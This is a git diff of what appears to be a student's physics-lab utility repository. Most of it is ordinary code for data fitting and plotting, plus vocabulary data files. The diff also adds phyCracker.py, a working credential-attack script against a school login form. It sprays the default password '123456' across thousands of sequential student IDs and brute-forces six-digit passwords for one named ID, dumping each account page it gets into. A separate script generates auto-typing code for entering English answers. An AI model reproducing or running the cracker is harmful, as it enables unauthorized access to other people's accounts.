diff --git a/.vscode/settings.json b/.vscode/settings.json
new file mode 100644
index 0000000000000000000000000000000000000000..615aafb035a1f363f614a893635f9d40d63ba911
--- /dev/null
+++ b/.vscode/settings.json
@@ -0,0 +1,3 @@
+    "python.pythonPath": "/usr/bin/python3"
\ No newline at end of file
diff --git a/.vscode/tags b/.vscode/tags
new file mode 100644
index 0000000000000000000000000000000000000000..af095532f5c96a5b7c9bb1f1ebd5dcfe1e919a25
--- /dev/null
+++ b/.vscode/tags
@@ -0,0 +1,172 @@
+!_TAG_FILE_FORMAT	2	/extended format; --format=1 will not append ;" to lines/
+!_TAG_FILE_SORTED	1	/0=unsorted, 1=sorted, 2=foldcase/
+!_TAG_PROGRAM_AUTHOR	Darren Hiebert	/dhiebert@users.sourceforge.net/
+!_TAG_PROGRAM_NAME	Exuberant Ctags	//
+!_TAG_PROGRAM_URL	http://ctags.sourceforge.net	/official site/
+DrawPoint.py	../DrawPoint.py	1;"	kind:file	line:1
+GetMap	../quickmap.py	/^def GetMap(parrX, parrY, windowX = 12, windowY = 8, line = False, passO = False):$/;"	kind:function	line:11
+GetMap	../sound/quickmap.py	/^def GetMap(parrX, parrY, windowX = 12, windowY = 8, line = False, passO = False):$/;"	kind:function	line:11
+GetMap	../va/quickmap.py	/^def GetMap(parrX, parrY, windowX = 12, windowY = 8, line = False, passO = False):$/;"	kind:function	line:11
+HallEffect.py	../hall/HallEffect.py	1;"	kind:file	line:1
+HallEffect2.py	../hall/HallEffect2.py	1;"	kind:file	line:1
+I	../va/va.py	/^I=[itrue\/150*float(sys.argv[3]) for itrue in Iraw]$/;"	kind:variable	line:11
+Imax	../hall/HallEffect.py	/^Imax = 5 # Maybe you need to change it to 0.5 for Im$/;"	kind:variable	line:11
+PyKeyboard	../input/dataInput.py	/^print('from pykeyboard import PyKeyboard')$/;"	kind:namespace	line:15
+PyKeyboard	../input/en.py	/^print('from pykeyboard import PyKeyboard')$/;"	kind:namespace	line:14
+PyKeyboard	../sound/dataInput.py	/^print('from pykeyboard import PyKeyboard')$/;"	kind:namespace	line:15
+U	../va/va.py	/^U=[utrue\/100*float(sys.argv[2]) for utrue in Uraw]$/;"	kind:variable	line:10
+_dump	../phyCracker.py	/^def _dump(sid,pswd):$/;"	kind:function	line:9
+ar	../input/dataInput.py	/^        ar=dataset #fuck numpy......$/;"	kind:variable	line:21
+ar	../input/en.py	/^ar=fd.read().replace('\\n','').replace('\\'','\\\\\\'').replace('’','\\\\\\'').split(sys.argv[2])$/;"	kind:variable	line:10
+ar	../sound/dataInput.py	/^        ar=dataset #fuck numpy......$/;"	kind:variable	line:21
+b	../hall/HallEffect2.py	/^    b = 4$/;"	kind:variable	line:100
+b	../hall/HallEffect2.py	/^b=toFloat(input('b(mm) 4.00 ?>'))$/;"	kind:variable	line:94
+c6	../hall/HallEffect2.py	/^c6 = k * l * 10 \/ (b * d)$/;"	kind:variable	line:106
+crackOneAccount	../phyCracker.py	/^def crackOneAccount(sid, rangeGen=range(1000000)):$/;"	kind:function	line:61
+d	../hall/HallEffect.py	/^d=toFloat(input('d(mm) 0.500 ?>'))$/;"	kind:variable	line:94
+d	../hall/HallEffect2.py	/^d=toFloat(input('d(mm) 0.500 ?>'))$/;"	kind:variable	line:93
+dat	../va/va.py	/^dat=numpy.loadtxt(sys.argv[1], delimiter=' ')$/;"	kind:variable	line:8
+dataInput.py	../input/dataInput.py	1;"	kind:file	line:1
+dataInput.py	../sound/dataInput.py	1;"	kind:file	line:1
+dataset	../input/dataInput.py	/^dataset=numpy.loadtxt(sys.argv[1], delimiter=' ')$/;"	kind:variable	line:13
+dataset	../sound/dataInput.py	/^dataset=numpy.loadtxt(sys.argv[1], delimiter=' ')$/;"	kind:variable	line:13
+doLogin	../phySpider.py	/^def doLogin():$/;"	kind:function	line:30
+doTest	../phySpider.py	/^def doTest(expNum, weekNum, cookieStr):$/;"	kind:function	line:41
+draw	../va/va.py	/^from quickmap import GetMap as draw$/;"	kind:namespace	line:4
+dumpWebpage	../phySpider.py	/^def dumpWebpage(content, filePath):$/;"	kind:function	line:36
+en.py	../input/en.py	1;"	kind:file	line:1
+errorPageDump	../phySpider.py	/^errorPageDump = '\/home\/recolic\/tmp\/phySpiderDump.html'$/;"	kind:variable	line:15
+experimentNumberDict	../phySpider.py	/^experimentNumberDict = {$/;"	kind:variable	line:18
+experimentNumberList	../phySpider.py	/^experimentNumberList = [52,53,54,55,56,57,58,59]$/;"	kind:variable	line:12
+fail	../phyCracker.py	/^fail=0$/;"	kind:variable	line:72
+farr	../hall/HallEffect.py	/^        farr = [abs(float(v)) for v in sarr]$/;"	kind:variable	line:30
+farr	../hall/HallEffect.py	/^        farr = [abs(float(v)) for v in sarr]$/;"	kind:variable	line:51
+farr	../hall/HallEffect.py	/^    farr = fcont.split('\\n')$/;"	kind:variable	line:19
+farr	../hall/HallEffect2.py	/^        farr = [abs(float(v)) for v in sarr]$/;"	kind:variable	line:29
+farr	../hall/HallEffect2.py	/^        farr = [abs(float(v)) for v in sarr]$/;"	kind:variable	line:50
+farr	../hall/HallEffect2.py	/^    farr = fcont.split('\\n')$/;"	kind:variable	line:18
+fcont	../hall/HallEffect.py	/^    fcont = fd.read()$/;"	kind:variable	line:17
+fcont	../hall/HallEffect2.py	/^    fcont = fd.read()$/;"	kind:variable	line:16
+fd	../hall/HallEffect.py	/^    fd = open(sys.argv[1])$/;"	kind:variable	line:16
+fd	../hall/HallEffect2.py	/^    fd = open(sys.argv[1])$/;"	kind:variable	line:15
+fd	../input/en.py	/^fd=open(sys.argv[1],'r')$/;"	kind:variable	line:9
+gsa	../hall/HallEffect.py	/^gsa=toFloat(input('B\/Im(KGS\/A) >'))$/;"	kind:variable	line:95
+hallC	../hall/HallEffect.py	/^hallC = k * d * 1e4 \/ (im * gsa) # KGs and mm$/;"	kind:variable	line:104
+im	../hall/HallEffect.py	/^    im = 0.45$/;"	kind:variable	line:103
+im	../hall/HallEffect.py	/^im=toFloat(input('Im(A) 0.450 ?>'))$/;"	kind:variable	line:96
+kb0	../hall/HallEffect.py	/^kb0 = [1,0]$/;"	kind:variable	line:67
+kb0	../hall/HallEffect2.py	/^kb0 = [10,0]$/;"	kind:variable	line:66
+kb0	../oil/oil0.py	/^kb0 = [10,0]$/;"	kind:variable	line:28
+kbFinal	../hall/HallEffect.py	/^kbFinal = leastsq(lossFunc, kb0, args=(I, V))$/;"	kind:variable	line:68
+kbFinal	../hall/HallEffect2.py	/^kbFinal = leastsq(lossFunc, kb0, args=(V, I))$/;"	kind:variable	line:67
+kbFinal	../oil/oil0.py	/^kbFinal = leastsq(lossFunc, kb0, args=(V, I))$/;"	kind:variable	line:29
+l	../hall/HallEffect2.py	/^    l = 3$/;"	kind:variable	line:102
+l	../hall/HallEffect2.py	/^l=toFloat(input('l(mm) 3.00 ?>'))$/;"	kind:variable	line:95
+leastsq	../hall/HallEffect.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+leastsq	../hall/HallEffect2.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+leastsq	../oil/oil0.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+leastsq	../quickmap.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+leastsq	../sound/quickmap.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+leastsq	../va/quickmap.py	/^from scipy.optimize import leastsq$/;"	kind:namespace	line:7
+lineFunc	../hall/HallEffect.py	/^def lineFunc(kb, i):$/;"	kind:function	line:60
+lineFunc	../hall/HallEffect2.py	/^def lineFunc(kb, v):$/;"	kind:function	line:59
+lineFunc	../oil/oil0.py	/^def lineFunc(kb, v):$/;"	kind:function	line:21
+lineFunc	../quickmap.py	/^    def lineFunc(kb, v):$/;"	kind:function	line:21
+lineFunc	../sound/quickmap.py	/^    def lineFunc(kb, v):$/;"	kind:function	line:21
+lineFunc	../va/quickmap.py	/^    def lineFunc(kb, v):$/;"	kind:function	line:21
+lossFunc	../hall/HallEffect.py	/^lossFunc = lambda kb, i, v : lineFunc(kb, i) - v$/;"	kind:variable	line:64
+lossFunc	../hall/HallEffect2.py	/^lossFunc = lambda kb, v, i : lineFunc(kb, v) - i$/;"	kind:variable	line:63
+lossFunc	../oil/oil0.py	/^lossFunc = lambda kb, v, i : lineFunc(kb, v) - i$/;"	kind:variable	line:25
+m_cookie	../phySpider.py	/^                m_cookie=m_cookie[0:len(m_cookie)-2]$/;"	kind:variable	line:99
+m_cookie	../phySpider.py	/^            m_cookie = cookieFile.readline()$/;"	kind:variable	line:97
+m_cookie	../phySpider.py	/^        m_cookie = input()$/;"	kind:variable	line:102
+m_cookie	../phySpider.py	/^    m_cookie = doLogin()$/;"	kind:variable	line:105
+matplotlib	../DrawPoint.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:2
+matplotlib	../hall/HallEffect.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+matplotlib	../hall/HallEffect2.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+matplotlib	../oil/oil0.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+matplotlib	../quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+matplotlib	../sound/quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+matplotlib	../va/quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+n	../hall/HallEffect.py	/^n = 1 \/ (hallC * 1.6021766208e-19)$/;"	kind:variable	line:105
+numpy	../DrawPoint.py	/^import numpy$/;"	kind:namespace	line:1
+numpy	../hall/HallEffect.py	/^import numpy, sys$/;"	kind:namespace	line:6
+numpy	../hall/HallEffect2.py	/^import numpy, sys$/;"	kind:namespace	line:6
+numpy	../input/dataInput.py	/^import numpy$/;"	kind:namespace	line:12
+numpy	../oil/oil0.py	/^import numpy, sys$/;"	kind:namespace	line:6
+numpy	../quickmap.py	/^import numpy$/;"	kind:namespace	line:6
+numpy	../sound/dataInput.py	/^import numpy$/;"	kind:namespace	line:12
+numpy	../sound/quickmap.py	/^import numpy$/;"	kind:namespace	line:6
+numpy	../va/quickmap.py	/^import numpy$/;"	kind:namespace	line:6
+numpy	../va/va.py	/^import numpy$/;"	kind:namespace	line:2
+oil0.py	../oil/oil0.py	1;"	kind:file	line:1
+oneLine	../input/dataInput.py	/^        oneLine=True$/;"	kind:variable	line:22
+oneLine	../input/dataInput.py	/^oneLine=False$/;"	kind:variable	line:18
+oneLine	../sound/dataInput.py	/^        oneLine=True$/;"	kind:variable	line:22
+oneLine	../sound/dataInput.py	/^oneLine=False$/;"	kind:variable	line:18
+parse	../phyCracker.py	/^import urllib.request, urllib.parse$/;"	kind:namespace	line:5
+parse	../phySpider.py	/^import urllib.parse, urllib.request$/;"	kind:namespace	line:6
+phyCracker.py	../phyCracker.py	1;"	kind:file	line:1
+phySpider.py	../phySpider.py	1;"	kind:file	line:1
+plt	../DrawPoint.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:2
+plt	../hall/HallEffect.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+plt	../hall/HallEffect2.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+plt	../oil/oil0.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+plt	../quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+plt	../sound/quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+plt	../va/quickmap.py	/^import matplotlib.pyplot as plt$/;"	kind:namespace	line:8
+px	../DrawPoint.py	/^px=numpy.linspace(0,65,1000)$/;"	kind:variable	line:16
+px	../hall/HallEffect.py	/^px=numpy.linspace(0,Imax,1000)$/;"	kind:variable	line:78
+px	../hall/HallEffect2.py	/^px=numpy.linspace(0,100,1000)$/;"	kind:variable	line:77
+px	../oil/oil0.py	/^px=numpy.linspace(0,maxX,1000)$/;"	kind:variable	line:39
+py	../hall/HallEffect.py	/^py=k*px+b$/;"	kind:variable	line:79
+py	../hall/HallEffect2.py	/^py=k*px+b$/;"	kind:variable	line:78
+py	../oil/oil0.py	/^py=k*px+b$/;"	kind:variable	line:40
+quickmap.py	../quickmap.py	1;"	kind:file	line:1
+quickmap.py	../sound/quickmap.py	1;"	kind:file	line:1
+quickmap.py	../va/quickmap.py	1;"	kind:file	line:1
+rcParams	../DrawPoint.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:3
+rcParams	../hall/HallEffect.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+rcParams	../hall/HallEffect2.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+rcParams	../oil/oil0.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+rcParams	../quickmap.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+rcParams	../sound/quickmap.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+rcParams	../va/quickmap.py	/^from matplotlib import rcParams$/;"	kind:namespace	line:9
+request	../phyCracker.py	/^import urllib.request, urllib.parse$/;"	kind:namespace	line:5
+request	../phySpider.py	/^import urllib.parse, urllib.request$/;"	kind:namespace	line:6
+rh	../hall/HallEffect2.py	/^rh=toFloat(input('RH(Calculated by HallEffect.py) ?>'))$/;"	kind:variable	line:96
+s	../hall/HallEffect.py	/^        s = input('>')$/;"	kind:variable	line:41
+s	../hall/HallEffect2.py	/^        s = input('>')$/;"	kind:variable	line:40
+sarr	../hall/HallEffect.py	/^        sarr = s.split(' ')$/;"	kind:variable	line:26
+sarr	../hall/HallEffect.py	/^        sarr = s.split(' ')$/;"	kind:variable	line:47
+sarr	../hall/HallEffect2.py	/^        sarr = s.split(' ')$/;"	kind:variable	line:25
+sarr	../hall/HallEffect2.py	/^        sarr = s.split(' ')$/;"	kind:variable	line:46
+success	../phyCracker.py	/^success=0$/;"	kind:variable	line:71
+sys	../hall/HallEffect.py	/^import numpy, sys$/;"	kind:namespace	line:6
+sys	../hall/HallEffect2.py	/^import numpy, sys$/;"	kind:namespace	line:6
+sys	../input/dataInput.py	/^import sys$/;"	kind:namespace	line:7
+sys	../input/en.py	/^import sys$/;"	kind:namespace	line:4
+sys	../oil/oil0.py	/^import numpy, sys$/;"	kind:namespace	line:6
+sys	../phySpider.py	/^import sys$/;"	kind:namespace	line:7
+sys	../sound/dataInput.py	/^import sys$/;"	kind:namespace	line:7
+sys	../va/va.py	/^import sys$/;"	kind:namespace	line:3
+time	../input/dataInput.py	/^print('import time')$/;"	kind:namespace	line:16
+time	../input/en.py	/^print('import time')$/;"	kind:namespace	line:15
+time	../sound/dataInput.py	/^print('import time')$/;"	kind:namespace	line:16
+toFloat	../hall/HallEffect.py	/^def toFloat(sstr):$/;"	kind:function	line:85
+toFloat	../hall/HallEffect2.py	/^def toFloat(sstr):$/;"	kind:function	line:84
+toFloat	../oil/oil0.py	/^def toFloat(sstr):$/;"	kind:function	line:46
+toFloat	../quickmap.py	/^    def toFloat(sstr):$/;"	kind:function	line:53
+toFloat	../sound/quickmap.py	/^    def toFloat(sstr):$/;"	kind:function	line:53
+toFloat	../va/quickmap.py	/^    def toFloat(sstr):$/;"	kind:function	line:53
+tryDump	../phyCracker.py	/^def tryDump(sid):$/;"	kind:function	line:57
+u	../hall/HallEffect2.py	/^u = c6 * rh$/;"	kind:variable	line:107
+urllib	../phyCracker.py	/^import urllib.request, urllib.parse$/;"	kind:namespace	line:5
+urllib	../phySpider.py	/^import urllib.parse, urllib.request$/;"	kind:namespace	line:6
+va.py	../va/va.py	1;"	kind:file	line:1
+weekNumberList	../phySpider.py	/^weekNumberList = [12,13,14,15,16,17]$/;"	kind:variable	line:11
+x	../DrawPoint.py	/^x=xrc$/;"	kind:variable	line:7
+xrc	../DrawPoint.py	/^xrc=[0.0, 2.0, 4.0, 10.0, 20.0, 22.0, 25.0, 30.0, 33.0, 35.0, 37.0, 38.0, 38.5, 39.0, 39.6, 40.0, 40.5, 41.0, 43.0, 44.0, 45.0, 46.0, 47.0, 48.0, 49.0, 50.0, 53.0, 55.0, 60.0]$/;"	kind:variable	line:6
+y	../DrawPoint.py	/^y=[abs(yi) for yi in yrc]$/;"	kind:variable	line:8
+yrc	../DrawPoint.py	/^yrc=[-6.77, -6.78, -6.78, -6.76, -6.73, -6.73, -6.72, -6.70, -6.69, -6.67, -6.60, -6.45, -6.37, -6.20, -5.99, -5.77, -5.45, -5.07, -3.52, -2.87, -2.36, -2.08, -1.77, -1.55, -1.40, -1.26, -0.97, -0.84, -0.64]$/;"	kind:variable	line:5
diff --git a/__pycache__/quickmap.cpython-36.pyc b/__pycache__/quickmap.cpython-36.pyc
index 93010c0d256ca909763358e61f48997018e88c3b..5941b8d85c574f82e1cb81064e894656e422ef5d 100644
Binary files a/__pycache__/quickmap.cpython-36.pyc and b/__pycache__/quickmap.cpython-36.pyc differ
diff --git a/input/2 b/input/2
new file mode 100644
index 0000000000000000000000000000000000000000..4a98a88475c36fe5f32000f18585f433a979cddf
--- /dev/null
+++ b/input/2
@@ -0,0 +1 @@
+fashionable clothes, trends, copied, traditional center, are guarded, July, great numbers, a high price, starting point, only a part
diff --git a/input/5.dat b/input/5.dat
new file mode 100644
index 0000000000000000000000000000000000000000..cedac8c42da09f7adf905c47e1ca9e9ea023d083
--- /dev/null
+++ b/input/5.dat
@@ -0,0 +1 @@
+looks funny, looks fine, out of fashion, good on her, out-dated, following the fashion trends, no wonder
diff --git a/input/aa b/input/aa
new file mode 100644
index 0000000000000000000000000000000000000000..73127bc64deefe8aa5d40526042e7e70886c4c47
--- /dev/null
+++ b/input/aa
@@ -0,0 +1 @@
+new clothes, full of clothes, university tuition, clothes in fashion, the Middle Ages, part-time job, not too expensive
diff --git a/input/d b/input/d
new file mode 100644
index 0000000000000000000000000000000000000000..1b85a8be6176e9ccbdd187143142d24f7336f24b
--- /dev/null
+++ b/input/d
@@ -0,0 +1 @@
+different and daring, Teenagers, their legs, shorter and shorter, five inches, loose morals, never appear, look childlike, women’s liberation, traditional
diff --git a/input/en.py b/input/en.py
new file mode 100755
index 0000000000000000000000000000000000000000..75e9e3940629aa8ce7d6412048979d045491782f
--- /dev/null
+++ b/input/en.py
@@ -0,0 +1,24 @@
+#!/bin/env python
+# It helps me to copy English answer really quick!
+import sys
+if len(sys.argv) < 3:
+    print('Usage: ./dataInput.py /path/to/dat/file \'delimiter\' | python')
+    exit(123)
+print('#!/bin/env python3')
+print('from pykeyboard import PyKeyboard')
+print('import time')
+print('print(\'Waiting for 5 second... Please be ready for auto-typing.\')')
+for i in ar:
+    if len(i) == 0:
+        continue
+    print('k.type_string(\''+i+'\')')
+    print('k.tap_key(k.tab_key)')
diff --git a/input/ff b/input/ff
new file mode 100644
index 0000000000000000000000000000000000000000..94d9bbbcc39128b5df860e1a31c04ff5a519527b
--- /dev/null
+++ b/input/ff
@@ -0,0 +1 @@
+nervous, afraid, first time, locker, blanket, come out, wore
diff --git a/input/sound-converted.dat b/input/sound-converted.dat
index d9c87a9180201d40d0a864065ce02281eac61596..2e6073ad6e3c6d376024de8fb2ba60ec23f21a54 100644
--- a/input/sound-converted.dat
+++ b/input/sound-converted.dat
@@ -1,2 +1 @@
 36837 37258 36845 37345 36870 37283 36855 37327 36843 37261
-3.54 4.37 8.26 25.9 13.2 47.7 17.7 66.95 22.46 87.16 27.14 108.6 32.06 129.9 36.68 150.8 41.48 173.35 46.3 194.69 50.86 217.16 55.8 239.56
diff --git a/phyCracker.py b/phyCracker.py
new file mode 100644
index 0000000000000000000000000000000000000000..007c755ec737a23a4ac19675726d0738d824bd0e
--- /dev/null
+++ b/phyCracker.py
@@ -0,0 +1,79 @@
+#!/bin/env python3
+# -*- coding: UTF-8 -*-
+# from http import cookies
+import urllib.request, urllib.parse
+def _dump(sid,pswd):
+    logData=urllib.parse.urlencode({
+        'xsxh':sid, 
+        'mm':pswd, 
+        'Login':'%B5%C7%C2%BC'
+    }).encode('utf-8')
+    req=urllib.request.Request('', headers={
+        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+        'Accept-Encoding':'gzip, deflate',
+        'Accept-Language':'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',
+        'Cache-Control':'no-cache',
+        'Connection':'keep-alive',
+        'Content-Length':'43',
+        'Content-Type':'application/x-www-form-urlencoded',
+        'Cookie':cookie,
+        'Host':'',
+        'Origin':'',
+        'Pragma':'no-cache',
+        'Referer':'',
+        'Upgrade-Insecure-Requests':'1',
+        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
+    })
+    resp=urllib.request.urlopen(req, data=logData)
+    respstr=resp.read().decode('utf-8', errors = 'backslashreplace')
+    if len(respstr) < 5000:
+        print('<div align="center"> Login failed.')
+        return False
+    print('<div align="center"> Login done.')
+    req=urllib.request.Request('', headers={
+        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+        'Accept-Encoding':'gzip, deflate',
+        'Accept-Language':'en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4',
+        'Cache-Control':'no-cache',
+        'Connection':'keep-alive',
+        'Cookie':cookie,
+        'Host':'',
+        'Origin':'',
+        'Pragma':'no-cache',
+        'Referer':'',
+        'Upgrade-Insecure-Requests':'1',
+        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
+    })
+    resp=urllib.request.urlopen(req)
+    respstr=resp.read().decode('gb2312', errors = 'backslashreplace')
+    print(respstr, len(respstr))
+    return True
+def tryDump(sid):
+    print('<div align="center"> -----Dumping', sid)
+    return _dump(sid,'123456')
+def crackOneAccount(sid, rangeGen=range(1000000)):
+    for i in rangeGen:
+        psw=str(i).zfill(6)
+        print('Testing', psw, '...')
+        if _dump(sid,psw):
+            print('Done. password='+psw)
+crackOneAccount('201614531', range(800000, 1000000))
+for i in range(201610001, 201617174):
+    if tryDump(str(i)):
+        success+=1
+    else:
+        fail+=1
+print('<div align="center"> Done. Success', success, 'Fail', fail)
diff --git a/phySpider.py b/phySpider.py
index f1d86ab0e1f7b2e127ecd3956bed25431c3e19fb..053b63e614d1400f8ac6adfd60d4d92894b12b37 100644
--- a/phySpider.py
+++ b/phySpider.py
@@ -6,20 +6,24 @@
 import urllib.parse, urllib.request
 import sys
-weekNumberList = [14,15,16,17,18]
-experimentNumberList = [37,38,39,40,41,42,43,44]
+#weekNumberList = [14,15,16,17,18]
+#experimentNumberList = [37,38,39,40,41,42,43,44]
+weekNumberList = [12,13,14,15,16,17]
+experimentNumberList = [52,53,54,55,56,57,58,59]
 errorPageDump = '/home/recolic/tmp/phySpiderDump.html'
 # Needn't edit below.
 experimentNumberDict = {
-    37:'分光计',
-    38:'多功能摆',
-    41:'直流电桥',
-    42:'伏安特性',
-    40:'密里根油滴',
-    43:'声速测量',
-    44:'示波器',
-    39:'霍尔效应'
+    57:'稳态测固体导热系数',
+    59:'电路的暂态过程',
+    58:'音叉实验',
+    56:'扭摆测转动惯量',
+    54:'光电效应',
+    52:'液体张力',
+    53:'偏振双折射',
+    55:'组合光学'
diff --git a/quickmap.py b/quickmap.py
index e0eb9bf9ef7982cea0c600d73e5b9643153f176c..13f8d60a5176511b8098470d59f6246efdcb10f4 100644
--- a/quickmap.py
+++ b/quickmap.py
@@ -8,44 +8,52 @@ from scipy.optimize import leastsq
 import matplotlib.pyplot as plt
 from matplotlib import rcParams
-def GetMap(parrX, parrY, windowX = 12, windowY = 8, line = False, passO = False):
+def dotMultiply(vctA, vctB):
+    if len(vctA) != len(vctB):
+        print("Error: While vcta is ", vctA, " and vctb is ", vctB)
+        raise ValueError("dotmulti needs lena == lenb.")
+    ans = 0
+    for a, b in zip(vctA, vctB):
+        ans += a * b
+    return ans
+def GetMap(parrX, parrY, windowSizeX=12, windowSizeY=8, extendXRate=1, line=False, passO=False, maxXPower=1):
     print('Generic-GetMap by Recolic.')
     arrX, arrY = parrX, parrY
-    maxX, maxY = max(arrX)*1.2, max(arrY)*1.25
+    maxX = max(arrX) * extendXRate
     # Do calculate
-    # y = k x + b (I = k V + b)
+    # y = [k0 k1 k2 ...] dot [x^0 x^1 x^2 ...]
     print('Your input: ', arrX, '|', arrY)
     print('Data collection done. Generating result...')
-    V, I = numpy.array(arrX), numpy.array(arrY)
-    def lineFunc(kb, v):
-        k,b=kb
+    X, Y = numpy.array(arrX), numpy.array(arrY)
+    def lineFunc(k, x):
+        vctX = [x ** power for power in range(maxXPower + 1)]
         if passO:
-            return k*v
-        else:
-            return k*v+b
+            vctX[0] = 0
+        return dotMultiply(k, vctX)
-    lossFunc = lambda kb, v, i : lineFunc(kb, v) - i
+    def lossFunc(k, x, y): return lineFunc(k, x) - y
     # Fire!
     if line:
-        kb0 = [10,0]
-        kbFinal = leastsq(lossFunc, kb0, args=(V, I))
-        k,b=kbFinal[0]
-        print('Fit line done. Y=', k, 'X +', b)
+        kInit = [1 for _ in range(maxXPower + 1)]
+        kInit[0] = 0 # guarantee passO.
+        kFinal, _ = leastsq(lossFunc, kInit, args=(X, Y))
+        print('Fit line done. k=', kFinal)
         print('Drawing map without fitting a line...')
     # Draw function map.
-    rcParams['grid.linestyle']='-'
+    rcParams['grid.linestyle'] = '-'
     rcParams['grid.color'] = 'blue'
     rcParams['grid.linewidth'] = 0.2
-    plt.figure(figsize=(windowX, windowY))
-    plt.scatter(V,I,color="red",label="Sample Point",linewidth=3)
+    plt.figure(figsize=(windowSizeX, windowSizeY))
+    plt.scatter(X, Y, color="red", label="Sample Point", linewidth=3)
     if line:
-        px=numpy.linspace(0,maxX,1000)
-        py=k*px+b
-        plt.plot(px,py,color="orange",label="Fitting Line",linewidth=2)
+        px = numpy.linspace(0, maxX, 1000)
+        py = dotMultiply(kFinal, [px ** power for power in range(maxXPower + 1)])
+        plt.plot(px, py, color="orange", label="Fitting Line", linewidth=2)
@@ -54,4 +62,4 @@ def GetMap(parrX, parrY, windowX = 12, windowY = 8, line = False, passO = False)
         if sstr == '':
             return 0.0
-            return float(sstr)
\ No newline at end of file
+            return float(sstr)
diff --git a/test.py b/test.py
new file mode 100644
index 0000000000000000000000000000000000000000..86b6559847537ff0239e0e3c0d13f5db9f9f2046
--- /dev/null
+++ b/test.py
@@ -0,0 +1,8 @@
+import quickmap
+yrc=[-6.77, -6.78, -6.78, -6.76, -6.73, -6.73, -6.72, -6.70, -6.69, -6.67, -6.60, -6.45, -6.37, -6.20, -5.99, -5.77, -5.45, -5.07, -3.52, -2.87, -2.36, -2.08, -1.77, -1.55, -1.40, -1.26, -0.97, -0.84, -0.64]
+xrc=[0.0, 2.0, 4.0, 10.0, 20.0, 22.0, 25.0, 30.0, 33.0, 35.0, 37.0, 38.0, 38.5, 39.0, 39.6, 40.0, 40.5, 41.0, 43.0, 44.0, 45.0, 46.0, 47.0, 48.0, 49.0, 50.0, 53.0, 55.0, 60.0]
+for i in range(15):
+    quickmap.GetMap(xrc, yrc, line=True, maxXPower=i, extendXRate=1)